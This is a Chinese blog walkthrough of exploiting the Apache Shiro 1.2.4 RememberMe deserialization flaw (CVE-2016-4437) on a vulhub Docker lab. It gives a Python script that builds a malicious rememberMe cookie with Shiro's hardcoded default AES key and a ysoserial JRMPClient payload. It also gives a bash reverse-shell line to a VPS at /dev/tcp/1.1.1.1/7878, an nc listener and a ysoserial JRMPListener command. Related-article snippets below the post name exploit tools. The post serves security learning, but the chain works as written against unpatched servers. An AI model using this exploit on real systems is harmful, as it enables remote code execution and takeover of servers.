Shiro RememberMe 1.2.4 反序列化漏洞复现

最新推荐文章于 2024-05-14 09:33:10 发布
最新推荐文章于 2024-05-14 09:33:10 发布
阅读量387 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44281516/article/details/108253679
版权

环境
kali虚拟机
vps
windwos物理机
安装docker环境
启动docker
systemctl start docker
搭建靶场

git clone https://github.com/vulhub/vulhub.git
cd vulhub/shiro/CVE-2016-4437
docker-compose up -d   #启动靶场

在这里插入图片描述
访问页面
在这里插入图片描述
接下来就是淦,准备poc和vps(需要java环境)
poc,百度找‘梦之履行地’大佬的

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
print "rememberMe={0}".format(payload.decode())

保存为shiro_shell.py,后面是vps的地址和端口

在这里插入图片描述
准备ysoserial-0.0.6-SNAPSHOT-all.jar包
如果没有jar包的,想自己生成的可以安装maven环境,比较难搞。然后执行

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -DskipTests

没报错就OK了
然后将ysoserial-0.0.6-SNAPSHOT-all.jar上传到vps中
在vps中用nc监听7878端口
在这里插入图片描述
反弹shell制作
反弹shell需要加密,网址:http://www.jackson-t.ca/runtime-exec-payloads.html
反弹shell代码如下

bash -i >& /dev/tcp/1.1.1.1/7878 0>&1             #1.1.1.1为vps ip

然后继续在vps中开一个窗口输入命令

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 '加密后的反弹shell'

vps设置已经弄好了可以进行测试了
在这里插入图片描述
返回vps上查看

在这里插入图片描述
比较幸运成功了

LJ会发光
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shrio序列漏洞_Shiro RememberMe 1.2.4 序列漏洞详细
weixin_33603377的博客
01-17 1276
目前已出图形界面工具,一键即可检测和getshell工具地址:https://github.com/feihong-cs/ShiroExploit使用案例:分割线(以上内容为最新更新内容)—————————————————————————————————————————————————————————————————————————————————————————————————————————...
shiro序列漏洞
wo41ge的博客
12-29 511
今天 把之前 落下来的 捡起来 师傅轻捶 好 要上了哦!! 漏洞 1.Shiro rememberMe序列漏洞Shiro-550) 0x01漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。 在服务端对rememberMe的cookie值 的流程是这样的 RememberMe Cookie值->base64解密->AES解密->序列 这就导致了序列RCE漏洞 我们 构造的payloa
漏洞系列--Shiro RememberMe 1.2.4 序列漏洞
梦之旅行地
02-05 2571
1、漏洞利用前提: Apache Shiro <= 1.2.4 2、靶场: 利用vulhub的靶场在服务器上搭建 注:docker相关配置就没有写了,靶场能运行就行 靶场搭建 git clone https://github.com/vulhub/vulhub.git cd /vulhub/shiro/CVE-2016-4437 docker-compose up -d #启动靶场 启...
最新SpringSecurity详细介绍RememberMe源码流程(1),面试几个月还没找到工作
最新发布
2401_84584628的博客
05-14 266
如果你选择了IT行业并坚定的走下去,这个方向肯定是没有一丝问题的,这是个高薪行业,但是高薪是凭自己的努力学习获取来的,这次我把P8大佬用过的一些学习笔记(pdf)都整理在本文中了《Java中高级核心知识全面解析》小米商场项目实战,别再担心面试没有实战项目:本文已被CODING开源项目:【一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码】收录需要这份系统的资料的朋友,可以点击这里获取。
Shiro RememberMe序列漏洞Shiro-550)
box
11-28 5007
0x00 漏洞原理简要分析 官方说明:https://issues.apache.org/jira/browse/SHIRO-550 Shiro提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 ShirorememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行 : 序列 =>AES加密 =>Base64编码操作 在识别身份
【网络安全---漏洞shiro550序列漏洞原理与漏洞和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 4664
shiro550序列漏洞原理与漏洞和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
Apache shiro1.2.4序列漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的序列漏洞。这个漏洞主要与RememberMe服务的实有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:序列漏洞序列漏洞通常出在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Shiro序列漏洞检测工具
01-05
Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的序列漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 序列漏洞通常出在应用程序接收到...
shiro序列漏洞暴力破解漏洞检测工具
09-14
1.shiro序列漏洞、暴力破解漏洞检测工具源码 2.shiro序列漏洞、暴力破解漏洞检测工具jar包 3.shiro序列漏洞、暴力破解漏洞检测工具启动方法 4.shiro序列漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
Shiro序列漏洞Shiro版本升级资源
06-22
shiro版本<=1.2.4时,其参数remeberMe存在硬编码,它对于cookie的处理流程是,首先获取rememberMe的cookie值,然后进行Base64解码,再进行AES解密,最后序列。但在这个过程中,其AES的Key硬编码,导致序列...
shiro-序列漏洞
weixin_54217950的博客
07-26 6418
shiro序列漏洞
Apache Shiro remember Me序列漏洞Shiro 550)
一位热爱网安的年轻人的博客
01-11 1062
Apache Shiro remember Me序列漏洞Shiro 550)
shiro序列工具_Shiro RememberMe 1.2.4 序列漏洞
weixin_39963440的博客
11-28 344
0x00 前言上班的时候收到了一个测的任务,打开一看,shiro序列漏洞,这是个Java的开发框架,但由于初测报告上的过程过于简略(唯一有用的只有KEY),所以不得不自己研究一番了。0x01环境搭建漏洞版本<=1.2.4,使用docker搭建docker pull medicean/vulapps:s_shiro_1 docker run -d -p 80:8080 medicean/...
apache shiro 序列漏洞解决方案
qq_36407469的博客
07-27 5205
一、序列漏洞介绍 序列:把对象转换为字符串或者字节流的过程。 序列:把字符串或者字节流恢为对象的过程。 序列漏洞的产生原理,即黑客通过构造恶意的序列数据,从而控制应用在序列过程中需要调用的类方法,最终实任意方法调用。如果在这些方法中有命令执行的方法,黑客就可以在服务器上执行任意的命令。 二、产生原因 shiro提供了记住我(RememberMe)的功能,即可以在关闭浏览器的情况下,下次打开时还能记住你是谁,无需登录即可访问。 shiro默认使用了CookieRememberMeMa
漏洞】Apache Shiro 序列漏洞
热门推荐
网络安全知识分享
12-31 1万+
Apache Shiro 序列漏洞一、简介二、环境三、漏洞原理四、AES秘钥1、判断AES秘钥五、Shiro rememberMe序列漏洞Shiro-550)1、版本1.4.2之前该版本漏洞利用2、版本1.4.2之后该版本漏洞利用六、Shiro Padding Oracle Attack(Shiro-721)1、漏洞利用七、图形工具 欢迎大家关注我的公众号“嘀嗒安全” shiro漏洞已经曝光很久了,一直没有整理思路与详细步骤,最近在学习java的序列漏洞来方便之后的学习 一、简介
Shiro序列漏洞(CVE-2016-4437)+docker靶场+工具利用
weixin_46411728的博客
07-16 2227
shiro_attack_2.2
shiro序列
cc777777777的博客
06-10 647
shiro序列
Apache Shiro 1.2.4序列漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个序列漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接序列执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值